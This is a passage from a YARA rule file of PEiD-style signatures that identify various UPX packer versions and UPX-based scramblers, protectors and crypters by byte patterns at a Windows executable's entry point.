00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 20 5B 35 30 30 6D 68 7A 5D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v070_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n        $b = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 
01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_093_UnHack32_11: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 80 43 00 8D BE 00 90 FC FF C7 87 D0 64 04 00 26 81 74 8D 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_093_UnHack32_12: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 A0 43 00 8D BE 00 70 FC FF C7 87 D0 84 04 00 98 C1 DF 2D 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_v12_Marcus_Lazlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_v01_Borland_Delphi_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n        $b = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 
00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 34 50 45 00 ?? ?? ?? 00 FF FF 00 00 ?? 24 ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 40 00 00 C0 00 00 ?? ?? ?? ?? 00 00 ?? 00 00 00 ?? 1E ?? 00 ?? F7 ?? 00 A6 4E 43 00 ?? 56 ?? 00 AD D1 42 00 ?? F7 ?? 00 A1 D2 42 00 ?? 56 ?? 00 0B 4D 43 00 ?? F7 ?? 00 ?? F7 ?? 00 ?? 56 ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 77 ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Inliner_v10_by_GPcH: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 05 FF FF FF 85 C0 0F 84 06 03 00 00 89 85 C5 FE FF FF E8 00 00 00 00 5B B9 31 89 40 00 81 E9 2E 86 40 00 03 D9 50 53 E8 3D 02 00 00 61 03 BD A9 FE FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 09 FF FF FF FF B5 05 FF FF FF 56 57 FF 95 C5 FE FF FF 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB CE 68 00 80 00 00 6A 00 FF B5 C5 FE FF FF FF 95 09 FF FF FF 8D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_070_PE: 
PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 EC 01 00 00 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_by_GurueXe: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_099_100_101_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE AE 00 00 00 8D BE 52 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? 60 BE 8D BE 57 83 CD }\r\n        $b = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? 
31 DB ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v124_Markus_Laszlo_overlay: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 EB 0B 90 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 ?? ?? 11 DB 72 ?? B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v10_CyberDoom: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_v001_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_01_500mhz: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v124_Markus_Laszlo_overlay_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 EB 0B 90 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 ?? ?? 11 DB 72 ?? 
B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_01_500mhz_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x: PEiD\r\n{\r\n    strings:\r\n        $a = { EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n        $b = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v060_v061_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_06_snaker: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 15 00 00 00 80 34 08 ?? E2 FA E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 
07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_050_070_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_040_051_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 21 05 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_083_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8C C8 05 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 12 10 73 E7 92 AF AD 0E 0E 0E 06 1F 07 16 BD 00 00 BB 00 80 55 CB 55 50 58 21 0A 03 03 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_300_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_pe_exe_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 
8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_LZMA_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_092_101_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { 81 FC 00 00 77 02 CD 20 B9 00 00 BE 00 00 BF 00 00 BB 00 80 FD F3 A4 FC 87 F7 83 EE C6 19 ED 57 57 E9 00 00 55 50 58 21 0B 01 04 07 00 00 00 00 00 00 00 00 00 00 00 00 06 00 FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_V01_HMX0101_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 
83 C6 01 FF E6 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_sibaway7yahoocom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_090_101_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8C C8 05 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 12 10 73 E7 92 AF AD 0E 0E 0E 06 1F 07 16 BD 00 00 BB 00 80 55 CB 55 50 58 21 0B 03 03 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v30_EXE_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 57 83 C3 04 53 68 ?? ?? ?? 00 56 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXcrypter_archphaseNWC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? 
?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_UPX_0896_102_105_124_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 07 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_7bit_Scrambler_102: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F 83 FA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_092_094_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE 2B 00 00 00 8D BE D5 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 
00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_084_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE D9 00 00 00 8D BE 27 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VisualUPX_02_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? 00 75 07 E9 ?? FE FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_RC_v1x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_084_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 00 00 00 8D BE 00 00 00 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 
